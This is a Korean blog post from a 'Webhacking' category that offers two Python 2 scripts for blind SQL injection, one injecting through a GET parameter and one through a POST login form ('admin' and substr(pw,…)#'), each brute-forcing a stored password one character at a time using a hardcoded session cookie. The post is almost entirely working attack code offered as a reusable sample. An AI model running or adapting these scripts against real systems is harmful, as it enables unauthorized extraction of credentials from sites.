Notice»

Recent Post»

Recent Comment»

Recent Trackback»

Archive»

« 2024/12 »
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30 31

 

'Blind'에 해당되는 글 1

  1. 2013.03.04 Python Blind Injection Sample
 

Python Blind Injection Sample

Webhacking | 2013. 3. 4. 02:07 | Posted by binaryU

[GET 방식 샘플]


import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1,100):
   print "%d" %j
   for i in range(33,126):
       url="http://binaryu.tistory.com/index.php?no=2+and+substring(pw,%d,1)=char(%d)" %(j,i)
       req=urllib2.Request(url)
       req.add_header('Cookie',"notice=yes; PHPSESSID=863fc9ebeb49ef2bb20976baed9de368")
       read=urllib2.urlopen(req).read()
       ok = re.findall("True",read)
       if ok:
           password=password+chr(i)
           print password
           break



[POST 방식 샘플]


import re,urllib,urllib2

#fw = urllib.urlopen("http://binaryu.tistory.com/index.php?no=2 and substring(pw,1,1)=char(%s)" %i)
#read = fw.read()

password=""

for j in range(1, 33):
   for i in range(48,123):
      if i < 58 or i > 96:
          url="http://binaryu.tistory.com/index.php"
          login_form={"id": "admin' and substr(pw,%d,1)=char(%s)#" %(j,i), "pw": ""}
          login_req=urllib.urlencode(login_form)
          req=urllib2.Request(url,login_req)
          req.add_header('Cookie',"notice=yes; PHPSESSID=c473aaff2c3d93c21ad8a0a2cf505036")
          read=urllib2.urlopen(req).read()
          ok = re.findall("Wrong password!",read)
          if ok:
              password=password+chr(i)
              print password
              break


'Webhacking' 카테고리의 다른 글

XML Attack Surface  (0) 2013.08.28
SQL Injection 공백 우회방법  (0) 2013.03.04
[PHP2EXE] PHP Compiler/Embedder 1.21  (0) 2013.03.04
.htaccess Attack Sample for PHP  (0) 2013.03.04
webhacking.kr 9번 문제 풀이  (1) 2013.03.04
: